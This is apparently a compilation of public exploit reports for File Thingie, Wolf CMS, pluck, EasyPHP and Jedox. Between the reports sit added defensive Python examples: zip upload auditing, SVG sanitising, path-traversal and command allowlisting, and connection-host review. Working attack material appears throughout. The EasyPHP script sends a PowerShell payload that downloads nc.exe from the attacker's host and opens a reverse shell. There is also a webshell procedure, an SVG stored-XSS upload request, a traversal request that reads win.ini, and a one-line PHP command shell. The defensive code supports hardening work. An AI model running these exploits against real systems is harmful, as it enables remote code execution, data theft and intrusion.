"--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")<br />    parser.add_argument("-P", "--LPORT", dest="lport", type=int, required=True, help="Local listener port")<br />    args = parser.parse_args()<br /><br />    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)<br />    exploit.try_login()<br />    exploit.create_new_folder()<br />    exploit.create_payload()<br />    exploit.upload_payload()<br />    exploit.unzip_payload()<br />    exploit.execute_payload()<br />    exploit.cleanup_local_files()<br /> <br /><br /></code></pre>
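File Thingie's unzip action extracts whatever the uploaded archive contains into a web-served folder, which is what turns a zip upload into code execution. The function below is an added example (not File Thingie code) of inspecting archive members before any server-side extraction: it rejects absolute or traversing paths, symlink entries, members with server-executable extensions, and oversized or extreme-ratio members, using a constructed in-memory archive.

```python
import io
import stat
import zipfile
from typing import List, Sequence, Tuple

# Extensions a PHP web server (or the handlers beside it) might execute if
# extracted under the document root. Includes .htaccess, which can re-map types.
BLOCKED_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phps", "phar",
    "cgi", "pl", "py", "sh", "htaccess",
}
MAX_MEMBER_BYTES = 20 * 1024 * 1024   # refuse single members above 20 MiB
MAX_RATIO = 100                        # uncompressed/compressed; zip-bomb guard


def _escapes_extraction_dir(name: str) -> bool:
    """True for absolute paths, drive-letter paths, or any '..' component."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return True
    return any(part == ".." for part in norm.split("/"))


def _has_blocked_extension(name: str) -> bool:
    """Check every extension segment, so 'x.php.txt' and '.htaccess' both hit."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return any(seg in BLOCKED_EXTENSIONS for seg in base.split(".")[1:])


def audit_zip(data: bytes) -> Tuple[bool, List[str]]:
    """Return (safe_to_extract, findings) for raw zip bytes.

    Nothing is extracted; only the central directory is read.
    """
    findings: List[str] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, ["not a valid zip archive"]
    with zf:
        for info in zf.infolist():
            name = info.filename
            if _escapes_extraction_dir(name):
                findings.append(f"{name}: path escapes extraction directory")
            if stat.S_ISLNK(info.external_attr >> 16):
                findings.append(f"{name}: symlink entry")
            if not info.is_dir() and _has_blocked_extension(name):
                findings.append(f"{name}: server-executable extension")
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append(f"{name}: member too large ({info.file_size} bytes)")
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                findings.append(f"{name}: suspicious compression ratio")
    return (not findings), findings


def build_sample_zip(members: Sequence[Tuple[str, bytes]]) -> bytes:
    """Constructed test helper: build an in-memory archive from (name, bytes) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members:
            zf.writestr(name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    # Same shape as the exploit's archive: a random-looking name with a .php member.
    sample = build_sample_zip([("AbCdEfGh.php", b"<?php system($_REQUEST['cmd']); ?>")])
    print(audit_zip(sample))
```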
<pre><code># Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)<br /># Date: 2023-05-02<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://wolf-cms.readthedocs.io<br /># Software Link: https://github.com/wolfcms/wolfcms<br /># Version: 0.8.3.1<br /># Tested on: Kali Linux<br /><br />### Steps to Reproduce ###<br /><br /># Firstly, go to the "Files" tab.<br /># Click on the "Create new file" button and create a php file (e.g: shell.php)<br /># Then, click on the file you created to edit it.<br /># Now, enter your shell code and save the file.<br /># Finally, go to https://localhost/wolfcms/public/shell.php<br /><br />### There's your shell! ###<br /><br /></code></pre>
<pre><code>Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)<br />Application: pluck<br />Version: 4.7.18<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://github.com/pluck-cms/pluck<br />Software Link: https://github.com/pluck-cms/pluck<br />Date of found: 01-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. create .svg file.<br />2. svg file content:<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br />3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)<br /><br />poc request<br /><br /><br />POST /pluck-4.7.18/admin.php?action=files HTTP/1.1<br />Host: localhost<br />Content-Length: 672<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/pluck-4.7.18/admin.php?action=files<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: 
PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de<br />Connection: close<br /><br />------WebKitFormBoundaryJMTiFxESCx7aNqmI<br />Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundaryJMTiFxESCx7aNqmI<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />------WebKitFormBoundaryJMTiFxESCx7aNqmI--<br /><br /><br /><br />4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg<br /><br /></code></pre>
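The Ulicms and pluck reports above both rely on an uploaded SVG that carries a `<script>` element, which the browser runs when the file is opened directly from the upload directory. The function below is an added example, not from either project, of a server-side check that parses an SVG with the standard library and reports active content: script and foreignObject elements, `on*` event handler attributes, `javascript:` hrefs and DOCTYPE declarations. It is run against a constructed copy of the report's SVG and a clean variant.

```python
import xml.etree.ElementTree as ET
from typing import List

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that can run script or embed foreign documents; 'set'/'animate'
# can rewrite attributes such as href at render time, so they are flagged too.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "set", "animate", "handler"}

# Constructed copy of the SVG body from the reports (DOCTYPE omitted here) and a clean one.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
 alert(document.location);
 </script>
</svg>
"""
CLEAN_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
"""


def _dangerous_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters before the scheme, so
    # strip them before comparing.
    compact = "".join(ch for ch in value if not ch.isspace() and ord(ch) > 31).lower()
    return compact.startswith(("javascript:", "vbscript:", "data:text/html"))


def svg_findings(data: bytes) -> List[str]:
    """Return reasons this SVG must not be served inline; an empty list means clean."""
    findings: List[str] = []
    if b"<!DOCTYPE" in data:
        # An image has no need for a DTD; DTDs can declare entities.
        findings.append("DOCTYPE declaration present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element is {root.tag!r}, not svg")
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()
        if local in ACTIVE_TAGS:
            findings.append(f"<{local}> element")
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()   # drop xlink: namespace prefix
            if name.startswith("on"):
                findings.append(f"<{local}> has event handler attribute {name}")
            elif name == "href" and _dangerous_url(value):
                findings.append(f"<{local}> href uses a script URL")
            elif name == "style" and "url(" in value.lower():
                findings.append(f"<{local}> style attribute loads external content")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


if __name__ == "__main__":
    print(svg_findings(MALICIOUS_SVG))   # lists the <script> element
    print(svg_findings(CLEAN_SVG))       # []
```

Whatever the check says, user-uploaded SVGs are safest served with `Content-Disposition: attachment` and a `Content-Security-Policy: sandbox` header, so that a missed vector does not execute in the site's origin.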
<pre><code># Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-06<br /># Vendor Homepage: https://www.easyphp.org/<br /># Software Link : https://www.easyphp.org/<br /># Tested Version: 14.1<br /># Tested on: Windows 7 and 10<br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-78<br /><br />Vulnerability description: There is an OS Command Injection in EasyPHP Webserver 14.1 that allows an attacker to achieve Remote Code Execution (RCE) with administrative privileges.<br /><br />Proof of concept:<br /><br />To detect:<br /><br />POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 28<br />Origin: http://127.0.0.1:10000<br />Connection: keep-alive<br />Referer: http://127.0.0.1:10000/index.php?zone=settings<br />Host: 127.0.0.1:10000<br /><br />app_service_control=calc.exe<br /><br />The calculator opens.<br /><br />Exploit:<br /><br />#!/usr/bin/python3<br />import requests<br />import sys<br /><br />if len(sys.argv) != 5:<br />    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")<br />    print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" % sys.argv[0])<br />    print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" % sys.argv[0])<br />    exit(1)<br /><br />else:<br />    target = sys.argv[1]<br />    targetport = sys.argv[2]<br />    localip = sys.argv[3]<br />    localport = sys.argv[4]<br />    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in the directory<br /><br />    payload = ("powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"<br />               + localip + ':8000' +<br />               "/nc.exe','%TEMP%\\nc.exe'))\";\"c:\\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"<br />               + localip + "+" + localport + "+-e+cmd.exe\"")<br />    print(payload)<br />    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'<br />    headers = {<br />        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"<br />    }<br />    data = {'app_service_control': payload}<br /><br />    try:<br />        r = requests.post(url, headers=headers, data=data)<br />    except requests.exceptions.ReadTimeout:<br />        print("The payload has been sent. Check it!")<br />        pass<br /><br /><br /># Vulnerability Type: Path Traversal<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-22<br /><br />Vulnerability description: An issue was discovered in EasyPHP Webserver 14.1. An Absolute Path Traversal vulnerability in / allows remote users to bypass intended SecurityManager restrictions and download any file if you have adequate permissions outside the documentroot configured on the server.<br /><br />Proof of concept:<br /><br />GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1<br />Host: 192.168.X.X:10000<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />HTTP/1.1 200 OK<br />Host: 192.168.X.X:10000<br />Connection: close<br />Content-Type: application/octet-stream<br />Content-Length: 499<br /><br />; for 16-bit app support [fonts] [extensions] [mci extensions] [files]<br />[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1<br />MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo<br />3gp=MPEGVideo 3gp2=MPEGVideo 
3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo<br />adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo<br />m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo<br />mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo<br /><br /></code></pre>
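Both EasyPHP issues above come down to trusting request input where a fixed policy belongs: the settings handler runs whatever string arrives in app_service_control, and the file server accepts `..%5c` sequences that decode to backslashes and climb out of the document root. The block below is an added example, not EasyPHP's code, showing the two corresponding checks in Python: a path resolver that decodes, unifies separators, collapses dot segments and then refuses anything that escapes the root or names a drive letter, and an action allowlist that replaces the free-form command with fixed argument vectors. The document root and the service name are assumptions; the traversal input is the advisory's own request path.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Assumed document root for the examples; the real server's root is not on the page.
DOCROOT = "/srv/easyphp/www"


def resolve_request_path(docroot: str, raw_path: str) -> Optional[str]:
    """Map an HTTP request path to a file under docroot, or return None if it escapes.

    The advisory's payload mixes URL encoding (%5c) with backslashes, which a
    Windows server treats as separators. Decode once (twice for double-encoded
    input), unify separators, collapse '.' and '..', then refuse anything that
    would climb above docroot or name a drive letter / alternate data stream.
    """
    path = raw_path.split("?", 1)[0]  # drop the query string
    decoded = unquote(path)
    if "%" in decoded:  # e.g. %255c -> %5c -> '\'
        decoded = unquote(decoded)
    if "\x00" in decoded or "%" in decoded:  # NUL byte or still-encoded input
        return None
    decoded = decoded.replace("\\", "/")
    rel = posixpath.normpath(decoded.lstrip("/"))  # leading '..' climbs survive normpath
    if rel == ".." or rel.startswith("../") or posixpath.isabs(rel) or ":" in rel:
        return None  # traversal, absolute path, drive letter or ADS
    full = posixpath.normpath(posixpath.join(docroot, rel))
    if full != docroot and not full.startswith(docroot.rstrip("/") + "/"):
        return None  # defence in depth: confirm containment after joining
    return full


# The RCE parameter app_service_control executed whatever string it received.
# A safe replacement maps a small set of action names to fixed argument vectors
# that are passed to subprocess.run(argv) without a shell. The Windows service
# name below is an assumption for the example.
SERVICE_ACTIONS = {
    "start": ["sc", "start", "EasyPHP-Webserver"],
    "stop": ["sc", "stop", "EasyPHP-Webserver"],
    "status": ["sc", "query", "EasyPHP-Webserver"],
}


def is_allowed_action(action: str) -> bool:
    return action in SERVICE_ACTIONS


def service_command(action: str) -> List[str]:
    """Return the argv for an allowed action; anything else is rejected outright."""
    if not is_allowed_action(action):
        raise ValueError(f"unknown service action: {action!r}")
    return list(SERVICE_ACTIONS[action])  # copy so callers cannot mutate the table


if __name__ == "__main__":
    # The advisory's traversal request, reproduced as input to the check.
    traversal = "/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
    print(resolve_request_path(DOCROOT, traversal))          # None
    print(resolve_request_path(DOCROOT, "/index.php?zone=settings"))
    print(is_allowed_action("calc.exe"), service_command("status"))
```

The order of operations matters: decoding before separator normalisation is what defeats `%5c`, and checking containment on the normalised result rather than rejecting the literal string `..` is what keeps the check from being bypassed by encodings the blocklist did not anticipate. On the command side there is no sanitising a shell string safely; the only robust fix is to stop accepting one.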
<pre><code># Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47880<br /><br /><br />Introduction<br />=================<br />An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the cleartext credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) The host part of a database connection can be changed in the connection details in the UI. Set the Host to a server that you control.<br /><br />2) Test the database connection.<br /><br />3) The webserver initiates a connection to the server that you control. Use Wireshark to capture the network traffic and ultimately extract the database credentials.<br /><br /></code></pre>
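The Jedox issue is a design weakness rather than a parsing bug: a user who may edit a connection can redirect the server's stored credentials to any host and then trigger the "test connection" call that sends them. The added example below (not Jedox code) shows the two controls that close that path on the application side, with an audit record for each decision: the new host must resolve into an approved database network, and the connection must require TLS with server verification so the credential exchange never reaches an unverified peer. The approved network, the hostnames and the resolver table are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Assumed policy: the only networks a connection test may contact (not from the advisory).
APPROVED_DB_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed resolver table standing in for DNS so the example runs offline.
FAKE_DNS: Dict[str, str] = {
    "db01.internal.example": "10.20.0.15",
    "attacker.example": "203.0.113.7",
}


@dataclass
class ConnectionChange:
    connection_id: str
    user: str
    old_host: str
    new_host: str
    require_tls: bool  # verify the server certificate before authenticating


@dataclass
class Decision:
    allowed: bool
    reason: str
    audit_event: Dict[str, str]


def resolve_host(host: str, resolve: Callable[[str], str]) -> IPAddress:
    """Accept a literal IP or resolve a hostname through the injected resolver."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return ipaddress.ip_address(resolve(host))


def review_connection_change(change: ConnectionChange,
                             resolve: Callable[[str], str]) -> Decision:
    """Decide whether a connection-host change may be saved and tested.

    Every decision produces an audit event so a host change that points the
    connection outside the database network is visible to the SOC even when
    the check itself blocks it.
    """
    event = {
        "action": "connection.host_change",
        "connection": change.connection_id,
        "user": change.user,
        "from": change.old_host,
        "to": change.new_host,
    }

    def deny(reason: str) -> Decision:
        event["result"] = "denied"
        event["reason"] = reason
        return Decision(False, reason, event)

    try:
        ip = resolve_host(change.new_host, resolve)
    except (KeyError, ValueError):
        return deny("host does not resolve")
    if not any(ip in net for net in APPROVED_DB_NETWORKS):
        return deny(f"{ip} is outside the approved database networks")
    if not change.require_tls:
        return deny("TLS with server verification is mandatory")
    event["result"] = "allowed"
    return Decision(True, "ok", event)


if __name__ == "__main__":
    change = ConnectionChange("conn-1", "alice", "db01.internal.example",
                              "attacker.example", True)
    print(review_connection_change(change, FAKE_DNS.__getitem__))
```

Checking the resolved address at edit time is not sufficient on its own, since a hostname can be repointed after the check; pinning the resolved IP into the saved connection, or enforcing the same allowlist at the network egress layer, closes that gap. The TLS requirement is what actually protects the credential: with server verification the client aborts the handshake against a host presenting an untrusted certificate before any authentication bytes are sent.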